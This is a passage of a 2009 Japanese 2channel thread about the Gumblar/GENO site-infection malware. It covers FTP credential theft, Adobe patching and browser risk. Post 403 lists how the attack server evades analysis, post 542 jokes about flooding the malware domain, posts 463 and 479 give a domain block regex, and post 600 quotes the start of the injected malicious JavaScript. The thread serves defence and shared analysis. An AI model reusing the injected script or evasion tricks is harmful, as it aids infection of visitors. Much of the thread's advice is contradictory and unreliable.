最近のウィルスはチェックソフトで見つからない奴が多くて怖いよ・・・。
394:名無しさん@お腹いっぱい。
09/05/16 22:52:31
Avastのサイトでウイルスクリーナーダウンロードしてみたんだけど
いざ検索を開始すると「ファイルが検索できません!」て表示が出る
なぜ??
395:名無しさん@お腹いっぱい。
09/05/16 22:52:48
>>391
ノートンは今俺の膝枕で寝ている
396:名無しさん@お腹いっぱい。
09/05/16 22:53:02
GENOギアス
397:名無しさん@お腹いっぱい。
09/05/16 22:53:38
cmd.exeでsqlsodbc.chmの容量確認したら0になってた
おかしいと思いつづ直接探しにいったら見つけられない、ファイル消えてる臭い
1時間前までは普通に確認できたんだけど何なんだろうなこれ。カスペルは問題なく当てられる
カスペルで変なもん引っかかったら報告しに来るよ
398:362
09/05/16 22:54:38
FTP以外で感染するかわかる人、いませんかー?
399:名無しさん@お腹いっぱい。
09/05/16 22:54:44
ところで、今のところ感染経路はAdobeのPDFかFlashの脆弱性をついたバイナリ実行によるものと認識しているんだが、
今感染してる連中ってのは、4月初めのGENO騒動のときに、FlashもReaderもUpdateしてなかった連中ってことか?
それとも何か別の感染経路があるのか?
400:名無しさん@お腹いっぱい。
09/05/16 22:54:58
GENOが潰れるなりしてくれたら
気分的にはすっきりするんだけどなあ
401:名無しさん@お腹いっぱい。
09/05/16 22:55:08
同人板のスレってアニメキャラ板とかのスレにも貼られてるんだな。
道理で馬鹿の他に初心者以下のカスがいるはずだ
402:名無しさん@お腹いっぱい。
09/05/16 22:55:11
>>324を検知するアンチウイルスソフトまとめて
403:名無しさん@お腹いっぱい。
09/05/16 22:55:47
>>351
ほんとだ…
以前チェックした時はgumblar.cnを読み込んでるサイトがほとんどだったんだが
恐らくリモートから攻撃コードを更新されたんだと思う
ちなみに直接ロケーションバーにmartuz■cn~を打ち込んでも
攻撃コードはダウンロードされないよ。
攻撃サーバはUA、IPアドレス、cookie、リファラを駆使して解析から逃れようと試みる。
攻撃コードをダウンロードするには
・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・cookieを拒否する
・XP以下のWindowsでアクセスする。またはUAを偽装する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える
以上の条件を満たすことが必要
404:名無しさん@お腹いっぱい。
09/05/16 22:55:52
FC2でサイト作ってる人はどうなんだろうかね(´・ω・`)
405:名無しさん@お腹いっぱい。
09/05/16 22:56:25
>>397
気になる
検索終わったら頼むな
406:名無しさん@お腹いっぱい。
09/05/16 22:56:32
ジーノってなんなの?
昔やったマリオRPGのイメージしか思い出せん
407:名無しさん@お腹いっぱい。
09/05/16 22:56:42
>>390
URLリンク(replica08.web.fc2.com)
多分これじゃないか
408:名無しさん@お腹いっぱい。
09/05/16 22:56:44
>>391
ノートン先生は俺のをなめてるよ
409:名無しさん@お腹いっぱい。
09/05/16 22:56:46
>>399
前者。だが前とはコードも飛ばし先も変わってる。
410:名無しさん@お腹いっぱい。
09/05/16 22:57:01
いつも仮想PC上からサイト更新してるんだけど、もしホストPCが感染していたら
仮想PCからのFTPも危険?
411:名無しさん@お腹いっぱい。
09/05/16 22:57:06
9.11でもダメって聞いたけどデマなの?
412:名無しさん@お腹いっぱい。
09/05/16 22:57:37
XPgenocideウイルスだなこりゃ
413:名無しさん@お腹いっぱい。
09/05/16 22:57:43
>>410
アウト
414:名無しさん@お腹いっぱい。
09/05/16 22:58:06
リーダーは削除した方がいい
415:名無しさん@お腹いっぱい。
09/05/16 22:58:06
>>410
多くの場合セーフ
416:名無しさん@お腹いっぱい。
09/05/16 22:58:32
>>413
ありがと、しばらく更新見送る
417:名無しさん@お腹いっぱい。
09/05/16 22:58:48
>>410
ホストならアウト
418:名無しさん@お腹いっぱい。
09/05/16 22:58:56
>>410
え?じゃあ単純にアップデートしてないからこうなったの?
もっとも亜種が広がればどうなるかは知らないが、拡散したやつはそこを突いてるやつだったわけか?
419:名無しさん@お腹いっぱい。
09/05/16 22:59:18
>>414
脆弱性のアップ来てるから削除する必要なし
420:名無しさん@お腹いっぱい。
09/05/16 22:59:33
>>410
セーフ
421:名無しさん@お腹いっぱい。
09/05/16 22:59:40
アドビリーダーって消して大丈夫なのか
422:418
09/05/16 22:59:49
×>>410 ○>>409 ごめん安価間違えた
423:名無しさん@お腹いっぱい。
09/05/16 23:00:12
>>388
いいえ
424:名無しさん@お腹いっぱい。
09/05/16 23:00:16
>>410
セフト
425:名無しさん@お腹いっぱい。
09/05/16 23:00:17
FlashもReaderもアップデートしてない人が多いんじゃない
してなくても余程古くない限りそれといった支障ないし
426:名無しさん@お腹いっぱい。
09/05/16 23:00:39
>>421
PDF読むのならもっと良いソフトもあるから
427:名無しさん@お腹いっぱい。
09/05/16 23:00:40
いらないっちゃいらない
いるっちゃいる
428:名無しさん@お腹いっぱい。
09/05/16 23:00:41
>>409
㌧、つまりサイト閲覧者の立場から見た場合、4月騒動の時点で感染経路を塞ごうと思えばいくらでも塞げたって事だな
429:名無しさん@お腹いっぱい。
09/05/16 23:01:14
あ、セーフっぽいのか
どちらにしろしばらく控えるけど
430:名無しさん@お腹いっぱい。
09/05/16 23:01:20
>>425
6.0からアップデートしてなかった。
慌ててやったよ。
431:名無しさん@お腹いっぱい。
09/05/16 23:01:19
リーダーが対応したのは何日か前の更新じゃないの?
432:名無しさん@お腹いっぱい。
09/05/16 23:01:24
>>398
いまのところそういうのはない
別のウイルスに感染してなきゃ大丈夫じゃね
ただし今のところなだけで今後どうなるかは不明
433:名無しさん@お腹いっぱい。
09/05/16 23:02:21
>>431
それとは別
434:名無しさん@お腹いっぱい。
09/05/16 23:02:26
もし感染したらってはなしなんだけど
自分が作成したHPみたらavastは警告出す?
435:名無しさん@お腹いっぱい。
09/05/16 23:03:16
>>428
adobeがセキュリティー対応したのは昨日か一昨日ぐらいじゃなかったか?
436:名無しさん@お腹いっぱい。
09/05/16 23:03:37
GENOウイルスに感染したclientがftp使われてjsうpするわけじゃないから
437:名無しさん@お腹いっぱい。
09/05/16 23:03:39
>>434
やつは進化するから確信はないだろ
438:名無しさん@お腹いっぱい。
09/05/16 23:03:41
>>426
pdfってAdobe以外でも読めたの!?
439:名無しさん@お腹いっぱい。
09/05/16 23:04:09
>>437
今のところはわかるってことですか?
440:名無しさん@お腹いっぱい。
09/05/16 23:04:13
>>435
それとは別です
441:名無しさん@お腹いっぱい。
09/05/16 23:04:27
>>438
情報弱者ってかわいそうだな
442:名無しさん@お腹いっぱい。
09/05/16 23:04:42
>>435
いや、もっと前に脆弱性の更新はあったよ
最近のはまた別
443:名無しさん@お腹いっぱい。
09/05/16 23:04:53
>>407
うちのAviraたんは反応してくれないがちゃんと攻撃コードは埋め込まれてるね
URLリンク(www.dotup.org)
444:名無しさん@お腹いっぱい。
09/05/16 23:05:03
質問きたら
「亜種が出てくるかもしれないからそれはわからん」って感じのレスしかできないよね
445:名無しさん@お腹いっぱい。
09/05/16 23:05:19
(1)感染してるサイトを閲覧する
(2)自分のパソコンが感染する
(3)その状態でFTPで自分のサイトを更新する
(4)その時にFTPのIDとパスを抜かれる
(5)ウイルスが勝手にHTML、phpファイル等に不正なジャバスクリプトを埋め込む
(6)サイトが感染状態になる。
(7)そのサイトを見た人が感染する
1) どっかの感染している index.html やら index.php やらを持ったサイトを、
自分のサイトのコンテンツを FTP で更新する担当の人がアクセスする
2) 担当の人の PC にトロイが侵入する
3) 2) で侵入したトロイは、担当の人が FTP で
自分のサイトにアクセスするのを待ち続ける
4) 担当の人が感染した PC から FTP で自分のサイトを更新すると、
トロイがその様子をチェックしていて、そのサイトにアクセスした
ログイン名とパスワードを盗み取る
5) トロイはしばらくすると自動的に、4) で盗んだパスワードを使って
そのサイトにアクセスし、index.html やら index.php やらをこっそり書き換えて、
そのサイトに感染コードを仕込む
5') もしうまく作ってあるトロイなら、ローカルの PC にある
自分のサイトに上げるためのファイルのローカルコピーにも、
同じ感染コードを仕込むだろう。
6) 1) に戻る
446:名無しさん@お腹いっぱい。
09/05/16 23:05:39
.cnドメイン全部塞いでればまだマシなのかもしれんな
447:名無しさん@お腹いっぱい。
09/05/16 23:07:20
スレざっと見た感じだと
Adobe製品さえ一切使わなければ感染は絶対にしないのか?
448:名無しさん@お腹いっぱい。
09/05/16 23:07:22
>>443
俺もavira
反応しないねぇ
javascriptOffだとだめみたい
Onにして配布元のpdfやらフラッシュをgetするところまでいくと
反応するんだろうか
ってかcnとkrを全ブロックてすごいなあんたw
449:名無しさん@お腹いっぱい。
09/05/16 23:07:23
URLリンク(www.i-like-movie.com)
感染してる
450:名無しさん@お腹いっぱい。
09/05/16 23:07:32
>>443
敵もavastやchromeなどで対策を講じているようだ
もうノートンやバスタークラスでは検知できないな
451:名無しさん@お腹いっぱい。
09/05/16 23:07:35
自分のサイトが感染してるかどうかはソース見たらわかるんだよね?
452:名無しさん@お腹いっぱい。
09/05/16 23:08:08
>>17
②を試して50,727バイトだった安心していいよな?
でも亜種多すぎてもう訳ワカンネ
cmd.exe開けても感染してるくらいだから、②も既に破られてんじゃね
453:名無しさん@お腹いっぱい。
09/05/16 23:08:17
>>449
してるなら踏ませないようにしろよ
454:名無しさん@お腹いっぱい。
09/05/16 23:08:23
>>444
現時点で既存亜種含めたウイルスの挙動を完全に解析した奴はいないっぽいからな。
突然HDD全消去するとかなにかの隠し機能がまだあるかもしれない。
455:名無しさん@お腹いっぱい。
09/05/16 23:08:41
>>447
使ってなくても古いのがインストールされてれば危ない
FlashPlayerなしっていうのはあんまりない状況だと思う
456:名無しさん@お腹いっぱい。
09/05/16 23:09:10
>>449
マジか?!
ここ閲覧者莫大じゃないの?
457:名無しさん@お腹いっぱい。
09/05/16 23:09:32
まぁ今の現状を見て書き込みすりゃいいよ
未来のことなんてわからんし
458:449
09/05/16 23:09:43
ごめん、嘘ぴょん
459:名無しさん@お腹いっぱい。
09/05/16 23:09:49
なんで感染してるのを貼るんだ
460:名無しさん@お腹いっぱい。
09/05/16 23:09:58
キーロガー使って個人情報を収集して送信するようなウィルスでもHDDを全部飛ばしたりするのか?
461:名無しさん@お腹いっぱい。
09/05/16 23:10:02
>>458
市ね
462:名無しさん@お腹いっぱい。
09/05/16 23:10:17
>>452
更新日時が今年の3月以降ならアウトという話も聞いた
463:名無しさん@お腹いっぱい。
09/05/16 23:11:31
*URLリンク(.*\)(cn|kr)/.*$/
採用
464:名無しさん@お腹いっぱい。
09/05/16 23:11:47
こんな状況で嘘はやめろよな、情報信じれなくなるじゃんか
465:名無しさん@お腹いっぱい。
09/05/16 23:11:50
>>460
ウイルス作ってる奴の気まぐれでそういうやり方に切り替えたりするかもね。
続々と亜種が出てるなら複数人でやってる可能性もあるし、
その中に紛れてる協調性の無い馬鹿がやらかしたりするかも・
466:名無しさん@お腹いっぱい。
09/05/16 23:12:00
Adobe Flashなんたらを消せばいいの?
467:名無しさん@お腹いっぱい。
09/05/16 23:12:16
>>449
C:\にアクセスするimg要素が有るけど感染してないのかなんだ。
468:名無しさん@お腹いっぱい。
09/05/16 23:12:47
>>462
五年前だ
よかった
469:名無しさん@お腹いっぱい。
09/05/16 23:13:00
大問題だと思うんだがまったく報道されてないのはなぜよ
470:名無しさん@お腹いっぱい。
09/05/16 23:13:00
>>451
多分
今の状態で言うと
471:名無しさん@お腹いっぱい。
09/05/16 23:13:03
>>466
いい加減巣に帰れよ
472:名無しさん@お腹いっぱい。
09/05/16 23:13:09
>>466
アップデートすれば良いだけだ
473:名無しさん@お腹いっぱい。
09/05/16 23:13:37
フレッツウイルスクリアさんは何もしてくれないのか
474:名無しさん@お腹いっぱい。
09/05/16 23:14:12
巣に帰れとかいい加減お前がうぜーよ
475:名無しさん@お腹いっぱい。
09/05/16 23:14:22
UAをVISTAのバージョンにしたら回避できる?
476:名無しさん@お腹いっぱい。
09/05/16 23:14:22
これって、ウィジェット経由でも感染するの?
477:名無しさん@お腹いっぱい。
09/05/16 23:14:43
Flashとかいらないんじゃない?
無駄に凝ってて面倒臭いサイトが増えていくだけだわ
478:名無しさん@お腹いっぱい。
09/05/16 23:15:18
Mozilla Firefox
opera
使えば何て事は無いのに・・・。
479:名無しさん@お腹いっぱい。
09/05/16 23:15:31
>>463
/^URLリンク(.*\.)(cn|kr)/.*$/
ね
480:名無しさん@お腹いっぱい。
09/05/16 23:15:37
>>458
風雪のルルで逮捕
481:名無しさん@お腹いっぱい。
09/05/16 23:15:48
ブラウザ関係なくね?
482:名無しさん@お腹いっぱい。
09/05/16 23:15:59
疑心暗鬼になってしまうな
483:名無しさん@お腹いっぱい。
09/05/16 23:16:04
>>460
最近はビジネス目的だからそういうのは少ない
484:名無しさん@お腹いっぱい。
09/05/16 23:16:45
>>462
日時についてはあてにならないです
485:名無しさん@お腹いっぱい。
09/05/16 23:16:47
>>481
少なくとも俺のFirefoxではPDFを持ってきてくれなかった
486:名無しさん@お腹いっぱい。
09/05/16 23:16:48
firefoxならgoogleに報告あがればブロックしてくれるな
operaだとリボンマジックそのまま開けたぞおい・・
487:名無しさん@お腹いっぱい。
09/05/16 23:16:53
わかりやすい症状が出るとすぐ対策されるんで、症状が違ったりわかりにくくなったりしてる亜種が現れてるってことか。
>>1とかのまとめも見直す必要があるんだろうか?
488:名無しさん@お腹いっぱい。
09/05/16 23:17:03
>>481
狐は確実に刎ねるよ
489:名無しさん@お腹いっぱい。
09/05/16 23:17:23
gumblar.cn タイムアウトが戻る
なんでだろ まあいいことだけどw
490:名無しさん@お腹いっぱい。
09/05/16 23:17:24
>>474
おねがいですから帰ってください
491:名無しさん@お腹いっぱい。
09/05/16 23:17:44
>>488
なんでそうなるんだ?理由がよくわからん
492:名無しさん@お腹いっぱい。
09/05/16 23:18:12
>>487
変化し過ぎて対応できるのだろうか?
493:名無しさん@お腹いっぱい。
09/05/16 23:18:41
>>479
ton
494:名無しさん@お腹いっぱい。
09/05/16 23:18:45
狐が刎ねるってより対象がIE
495:名無しさん@お腹いっぱい。
09/05/16 23:18:54
>>481
スクリプトがIE以外はねてた
最新のスクリプトがそうかはわからんけど
今後変わるかもしれないしどれが安全とかはあんまりないとおもう
496:名無しさん@お腹いっぱい。
09/05/16 23:19:12
相手するな
そいつに日本語は通じない
497:名無しさん@お腹いっぱい。
09/05/16 23:19:21
>>491
火狐はgoogleの攻撃サイトDBを読み込んでるから
498:名無しさん@お腹いっぱい。
09/05/16 23:19:25
毎度書き込まれるけど「確実」とか「大丈夫」とかないって
499:名無しさん@お腹いっぱい。
09/05/16 23:19:38
>>494-495
なるほど。ありがとう。
一応狐使いだが油断しないようにしておく。
500:名無しさん@お腹いっぱい。
09/05/16 23:20:01
>>491
URLリンク(www.dotup.org)
”今のところは”大丈夫だがな
501:名無しさん@お腹いっぱい。
09/05/16 23:20:01
Sleipnirから火狐にするのがめんどくせええ
502:名無しさん@お腹いっぱい。
09/05/16 23:20:15
ブラウザ選ぶぐらいで安全になるようなウィルスなら脅威ではない。
503:名無しさん@お腹いっぱい。
09/05/16 23:20:18
市販のアンチウイルスソフトいれてるから大丈夫だよね?
504:名無しさん@お腹いっぱい。
09/05/16 23:20:51
>>498
VB入ってれば確実に大丈夫だ
505:名無しさん@お腹いっぱい。
09/05/16 23:21:10
>>503
エラーでも起こしてるのかw
506:名無しさん@お腹いっぱい。
09/05/16 23:21:44
>>504
そうで無くなってきた。
507:名無しさん@お腹いっぱい。
09/05/16 23:21:50
>>503
バスターなら安心
508:397
09/05/16 23:22:35
カスペルスキャン中暇なんでログ漁ってたら俺と似た人がいた
ただこれと違ってちゃんとカスペルが動く
更新日時確認したら2009/05/16 21:56とかなり最近、その頃PCの再起動をかけてたと思う
>>1の病状は無し。おまいらPCの再起動をかけてcmd.exeで調べてみてくれないか?
63 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:22:44
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト?
さっきまで1個のファイル 50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:30:24
>>65>>66
開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・
78 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 05:38:00
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう
509:名無しさん@お腹いっぱい。
09/05/16 23:22:37
>>503
ウィルスセキュリティゼロですか^^
510:名無しさん@お腹いっぱい。
09/05/16 23:23:15
>>509
ウィルスセキュリティゼロだとだめなんでうsか
511:名無しさん@お腹いっぱい。
09/05/16 23:23:17
あぁ、最初からIEのみを攻撃対象にしてたのか
なるほど
512:名無しさん@お腹いっぱい。
09/05/16 23:23:19
とりあえずSophosに乗り換えてみた
これで安心…なのか?
513:名無しさん@お腹いっぱい。
09/05/16 23:23:31
ノートン大先生がクッキーに反応したぜ
やれば出来るじゃないか。安心安心
514:名無しさん@お腹いっぱい。
09/05/16 23:23:35
>>501
同意
515:名無しさん@お腹いっぱい。
09/05/16 23:23:44
ノートン先生・・・・・・・・
516:名無しさん@お腹いっぱい。
09/05/16 23:23:50
>>503
市販のソフトはドンドン無効化しているな
517:名無しさん@お腹いっぱい。
09/05/16 23:23:56
確実に大丈夫なのは
Mozilla Firefox+ウイルスバスター
518:名無しさん@お腹いっぱい。
09/05/16 23:24:35
>>514
めんどくさいよな
519:名無しさん@お腹いっぱい。
09/05/16 23:24:36
こっちが胃もたれするくらいのアンチIE論者で火狐使いの知人が感染してたから、
「火狐だから大丈夫」なんて、とてもじゃないけど思えない
520:名無しさん@お腹いっぱい。
09/05/16 23:24:39
バスターさん対応するようになったのか?
昨日まで無意味だとか言われてたように思うんだけど
521:名無しさん@お腹いっぱい。
09/05/16 23:24:43
サイト見なければ大丈夫だろ
522:名無しさん@お腹いっぱい。
09/05/16 23:25:01
俺のノートン先生は今どこに・・・?
523:名無しさん@お腹いっぱい。
09/05/16 23:25:12
>>510
ウイルスに対するセキュリティがゼロだから
524:名無しさん@お腹いっぱい。
09/05/16 23:25:19
>>492
セキュリティ会社が有効な対策を出すまでは、
感染した可能性があったら再インストール、に絞っちゃった方がよかったりして。
予防に関してはこれまで通りでよさそうだけど。
525:名無しさん@お腹いっぱい。
09/05/16 23:25:27
>>521
そういうあなたにラブレター。
526:名無しさん@お腹いっぱい。
09/05/16 23:25:43
>>519
それ本当?
527:名無しさん@お腹いっぱい。
09/05/16 23:25:49
>>522
もう夜も遅いからな
俺が腕枕してやったら寝ちゃったよ
528:名無しさん@お腹いっぱい。
09/05/16 23:25:54
同人板のやつ等がウイルスの挙動研究しててソレがまったくの的外れでワロタ
529:名無しさん@お腹いっぱい。
09/05/16 23:25:56
ブラウザ云々以前にネサフしなきゃ問題ないだろ
530:名無しさん@お腹いっぱい。
09/05/16 23:26:26
テンプレが危機感感じてここに来た人向けじゃないのが問題だわ
要するに
FlashPlayerとAcrobat Readerを最新にしとけばいいだけ。
セキュ板ってコミュ弱人間多すぎか長文でしか説明できない馬鹿ばかりだねぇ
531:名無しさん@お腹いっぱい。
09/05/16 23:26:27
linuxならアクセスしても大丈夫だよね?今のところは
サブ機がubuntuなんだ
532:名無しさん@お腹いっぱい。
09/05/16 23:26:33
なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる
533:名無しさん@お腹いっぱい。
09/05/16 23:26:34
>>520
どうせ最新亜種には追いつけないんじゃね?
534:名無しさん@お腹いっぱい。
09/05/16 23:26:44
集団ヒステリーっぷりが滑稽だな
535:名無しさん@お腹いっぱい。
09/05/16 23:26:44
フォクすけ使いだけど
亜種が出まくってるこの現状で絶対安心とかは有り得ないと思うが
536:名無しさん@お腹いっぱい。
09/05/16 23:26:47
>>520
設定変更で昨日まで使えていた
今は使えない
537:名無しさん@お腹いっぱい。
09/05/16 23:26:50
>>518
だよなー
火狐ってめんどくさそうなイメージがある
オペラにしようかな
538:名無しさん@お腹いっぱい。
09/05/16 23:26:53
同人サイトに感染してる事を運営に通報したら消えた!!
よし! 被害者を無くそう!
539:名無しさん@お腹いっぱい。
09/05/16 23:27:39
u.batを検知できないの?こいつを検知できれば万が一感染しても大丈夫なんじゃね?
540:名無しさん@お腹いっぱい。
09/05/16 23:27:41
WIN2Kにsqlsodbc.chmがあって
サイズが
サイズ 45.0 KB (46133 バイト)
ディスク場のサイズ 48.0 KB (49152 バイト)
だったんだがこれは感染してるって事でいいんだよね。
一応コマンドプロンプトやレジエディは立ち上がるけど
ウイルスソフトの更新 ・Kaspersky とニフティオンラインスキャン
は見事に失敗したし
IEなんてここ一年くらい使った事無かったのに
OPERA使いでもくらうのか このウイルス 最悪
541:名無しさん@お腹いっぱい。
09/05/16 23:27:46
>>530
クマー
542:名無しさん@お腹いっぱい。
09/05/16 23:27:53
gumblar.cnに田代砲撃ち込むってのは?
543:名無しさん@お腹いっぱい。
09/05/16 23:28:19
>>538
そして全てのサイトが消失するorz
544:名無しさん@お腹いっぱい。
09/05/16 23:28:43
過去最強なのかなぁ、このウイルス
545:名無しさん@お腹いっぱい。
09/05/16 23:28:52
>>530
このスレの1の最初のほう見たか?
長文で騒いでるのは駆け込んできたやつらだろう
546:名無しさん@お腹いっぱい。
09/05/16 23:29:06
>>540
オペラもだめか・・・
やっぱり火狐に鞍替えすべきなのかな
547:名無しさん@お腹いっぱい。
09/05/16 23:29:22
94.229.65.160/27の範囲を教えてくださいまし。
548:名無しさん@お腹いっぱい。
09/05/16 23:29:31
>>532
jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。
549:名無しさん@お腹いっぱい。
09/05/16 23:29:32
もうこんなウイルスだらけのネットに居られるか!
俺は専ブラに戻るからな!
550:名無しさん@お腹いっぱい。
09/05/16 23:29:39
>>540
たぶんビンゴだと思うけど、そのファイルをダブルクリックするとどうなる?
本来ならヘルプファイルが開くはずなんだが。
551:名無しさん@お腹いっぱい。
09/05/16 23:29:42
某乙女ゲーサイトにアクセスした
ソース見て、改行されてない横に長くて、なんか&だか#の多い部分が危ないスクリプト?
552:名無しさん@お腹いっぱい。
09/05/16 23:29:57
>>542
ガトリング漢砲ってのがあったな
553:名無しさん@お腹いっぱい。
09/05/16 23:30:00
>>546
アドビ更新すれば良いだけなんだけどな~。
554:名無しさん@お腹いっぱい。
09/05/16 23:30:18
ちょろめはどうかね
555:名無しさん@お腹いっぱい。
09/05/16 23:30:25
単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね
556:名無しさん@お腹いっぱい。
09/05/16 23:30:33
>>544
この程度が過去最強だと?
557:名無しさん@お腹いっぱい。
09/05/16 23:31:07
>>526
本当。
オンラインスキャンでアウト判定でたらしい。
まぁ他のPCセキュリティ環境がいまいち分からないから
これ以上はなんとも。
558:名無しさん@お腹いっぱい。
09/05/16 23:31:17
>>500
セキュリティ設定で
攻撃/偽装サイトとして報告されているサイトを表示するときに報告する
がonになってたときだけな
559:名無しさん@お腹いっぱい。
09/05/16 23:31:31
>>542
何万台ものサーバーやソンビー・クライアントをコントロールできる敵に立ち向かうのか?
返り討ちにあうぞ
560:名無しさん@お腹いっぱい。
09/05/16 23:31:33
NIMDA知らんのか
あれはやばかった
561:名無しさん@お腹いっぱい。
09/05/16 23:31:34
山田とか苺きんたまとかそういうレベルでおもしろい奴くればいいのに
腐女子のデスクトップ丸見え
562:名無しさん@お腹いっぱい。
09/05/16 23:31:56
>>557
IEプラグイン入れてたんだろ。
563:名無しさん@お腹いっぱい。
09/05/16 23:32:10
Macなら大丈夫
この際だからお前ら全員乗り換えろ
564:540
09/05/16 23:32:17
>>550
開いていいものなのか?
まあもうどうせ待避させてフォーマットしかないからどっちでも同じだろうけど
565:名無しさん@お腹いっぱい。
09/05/16 23:32:17
>>558
それはあえて切らない限りはチェック入ってると思うけどな
566:名無しさん@お腹いっぱい。
09/05/16 23:32:34
>>553
もうやってる
でも心配なんだよ
567:名無しさん@お腹いっぱい。
09/05/16 23:32:56
アップル大勝利
568:名無しさん@お腹いっぱい。
09/05/16 23:33:01
>>563
乗り換えると今度はMacが標的になるんですね、わかります
569:名無しさん@お腹いっぱい。
09/05/16 23:33:05
>>564
たしかに言われてみればそうだな、やめといたほうがいいかもしれない
570:名無しさん@お腹いっぱい。
09/05/16 23:33:19
>>563
.ハ,,ハ
( ゚ω゚ )
571:名無しさん@お腹いっぱい。
09/05/16 23:33:21
firefoxでも感染しますたorz
pdfファイルいくつか開けたからか?
これから再インスコしてきますorz
572:名無しさん@お腹いっぱい。
09/05/16 23:33:25
GENOのサーバーMacだけど感染したぞw
573:名無しさん@お腹いっぱい。
09/05/16 23:33:28
>>558
涙拭けよ
574:名無しさん@お腹いっぱい。
09/05/16 23:33:33
火狐使い勝手悪い…でも我慢
575:名無しさん@お腹いっぱい。
09/05/16 23:33:35
442 名前: スカシタゴボウ(アラバマ州)[sage] 投稿日:2009年05月16日(土) 23:32:11.00 ID:hgwQOSJu
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) にUserAgent変えたら感染しないってマジ?
576:名無しさん@お腹いっぱい。
09/05/16 23:33:50
>>566
FlashもReaderも削除しろwこれなら完璧だ
577:名無しさん@お腹いっぱい。
09/05/16 23:33:54
>>556
相手がadobeの脆弱性を狙ってやっているが
他の脆弱性を隠し持ってないとも限らない
いつ何時その攻撃手法に変えるかわからない
578:名無しさん@お腹いっぱい。
09/05/16 23:34:25
>>572
食らったWinマシンが更新して改ざんしちゃったんだろ?
579:名無しさん@お腹いっぱい。
09/05/16 23:34:29
ああ、そういやFirefoxでもIE Tabとか入れてたら
IEエンジンで読み込む場合があるな
580:名無しさん@お腹いっぱい。
09/05/16 23:34:29
ヌルポ
581:名無しさん@お腹いっぱい。
09/05/16 23:34:41
デフォルトなら火狐が一番危ないよ
先読みするから
582:名無しさん@お腹いっぱい。
09/05/16 23:35:01
IEコンポでUAをFirefoxにしたらどうなるん?
583:名無しさん@お腹いっぱい。
09/05/16 23:35:13
>>555
いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。
Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。
584:名無しさん@お腹いっぱい。
09/05/16 23:35:14
昼から何か進化した?
585:名無しさん@お腹いっぱい。
09/05/16 23:35:23
FlashもReaderも削除したけどまだ不安だ
FlashもReaderも使わない亜種が出てくるかもしれない
586:名無しさん@お腹いっぱい。
09/05/16 23:35:24
>>548
どれも同じだよ。>>324
確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。
587:名無しさん@お腹いっぱい。
09/05/16 23:35:26
>>526
まーAdobeReaderはFirefoxからも開けるから関係ないんじゃね?
そもそもブラウザを直接狙うんじゃなくてそこから呼び出したAdobeReaderを使って感染してるみたいだし。
まさかFirefox使っておいてNoScript使ってなかったのかね
588:名無しさん@お腹いっぱい。
09/05/16 23:35:42
URLリンク(www.trendmicro.com)
ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。
これはひどいwww
589:名無しさん@お腹いっぱい。
09/05/16 23:35:48
>>581
エンジンが違うから火狐は大丈夫と何度云えば・・・。
590:名無しさん@お腹いっぱい。
09/05/16 23:36:03
>>551
<body>タグの直前だったら可能性が高い。
でもスパム対策でメアドとかを難読化してるサイトもあるから
その情報だけでは何とも言えん。
591:名無しさん@お腹いっぱい。
09/05/16 23:36:08
>>571
サイト教えて。
592:名無しさん@お腹いっぱい。
09/05/16 23:36:27
最新のADOBIでも危ないと聞いたんだがマジ?
593:名無しさん@お腹いっぱい。
09/05/16 23:36:37
ウイルス感染サイトにウイルスとは別のスクリプト埋め込んで
サイトにアクセスしたPCをランダムにtelnet飛ばして感染拡大とか
ありえないか
594:名無しさん@お腹いっぱい。
09/05/16 23:36:57
>>571
おいサイトくらい晒してけ
何のためにこのスレいんだよ
595:名無しさん@お腹いっぱい。
09/05/16 23:38:15
>>577
アホかw他のところ付いてきてから言えよw
596:名無しさん@お腹いっぱい。
09/05/16 23:38:20
>>593
日本語で話せよ
597:名無しさん@お腹いっぱい。
09/05/16 23:38:25
> pdfファイルいくつか開けたからか?
本人も特定できてないんじゃないのか
598:名無しさん@お腹いっぱい。
09/05/16 23:39:20
>>589
油断してんじゃねーよカス
インフルエンザだって変化したんだよ
599:名無しさん@お腹いっぱい。
09/05/16 23:39:47
Gecko系ブラウザは大丈夫って事?
600:名無しさん@お腹いっぱい。
09/05/16 23:40:25
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if(
(u.indexOf("Chrome")<0)&&
(u.indexOf("Win")>0)&&
(u.indexOf("NT 6")<0)&&
(document.cookie.indexOf("miek=1")<0)&&
(typeof(zrvzts)!=typeof("A"))
){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
